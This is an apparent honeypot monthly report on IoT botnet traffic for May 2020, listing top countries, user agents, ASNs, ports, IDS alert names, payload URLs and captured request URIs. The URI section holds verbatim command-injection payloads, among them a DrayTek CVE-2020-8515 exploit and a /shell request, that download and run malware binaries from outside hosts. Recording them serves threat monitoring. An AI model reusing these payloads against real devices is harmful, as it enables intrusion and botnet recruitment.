Tracking IoT Botnets

May 2020

Country - Top 10
  • United States
  • United Kingdom
  • China
  • Republic of Moldova
  • Canada
  • Italy
  • United Arab Emirates
  • Taiwan
  • Russia
  • Mexico
User-Agent - Top 10
  • python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.18.1.el7.x86_64
  • XTC
  • python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.28.1.el6.x86_64
  • Wget/1.11.4
  • polaris botnet
  • Hello, world
  • XTC BOTNET
  • Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
  • Hello, World
  • DVRBOT
ASN - Top 10
  • NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC
  • Chinanet
  • MivoCloud SRL
  • Comcast Cable Communications, LLC
  • CNCGROUP China169 Backbone
  • Data Communication Business Group
  • Emirates Telecommunications Corporation
  • Dotsi, Unipessoal Lda.
  • Compañía Dominicana de Teléfonos, C. por A. - CODETEL
  • EPM Telecomunicaciones S.A. E.S.P.

May 2020 - ASN

Destination Ports - Top 10
  • 55555
  • 80
  • 8089
  • 443
  • 9673
  • 60001
  • 52869
  • 5555
  • 49152
  • 38620

May 2020 - Dest Ports

Alert Signature
  • ET WEB_SERVER WebShell Generic - wget http - POST
  • ET WEB_SERVER 401TRG Generic Webshell Request - POST with wget in body
  • ET EXPLOIT Linksys E-Series Device RCE Attempt
  • ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound
  • ET INFO User-Agent (python-requests) Inbound to Webserver
  • ET SCAN ELF/Mirai Variant User-Agent (Inbound)
  • SURICATA HTTP missing Host header
  • SURICATA HTTP Unexpected Request body
  • ET EXPLOIT Multiple DrayTek Products Pre-authentication Remote RCE Inbound (CVE-2020-8515) M2
  • SURICATA STREAM Packet with invalid timestamp
Top HTTP Requests
  • 50.115.173.126/TiHO8bbins.sh
  • 50.115.172.172/Boih7nbins.sh
  • 51.178.81.75/bins.sh
  • 50.115.172.193/Boih7nbins.sh
  • 178.33.64.107/arm7
  • plexle.us/Th5xrRAm
  • 164.132.92.168:6479/bins/viktor.mips
  • 50.115.172.100/Bu07Fjfbins.sh
URI
  • /tmUnblock.cgi
  • /cgi
  • /cgi-bin/mainfunction.cgi
  • /spywall/timeConfig.php
  • /live/CPEManager/AXCampaignManager/delete_cpes_by_ids
  • /boaform/admin/formPing
  • /bot/bot.mipsel
  • /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a
  • /shell?cd+/tmp;rm+-rf+jaws.sh;wget+http:/\/185.62.189.18/jaws.sh;chmod+777+jaws.sh;sh+jaws.sh;rm+-rf+jaws.sh
  • /UD/act?1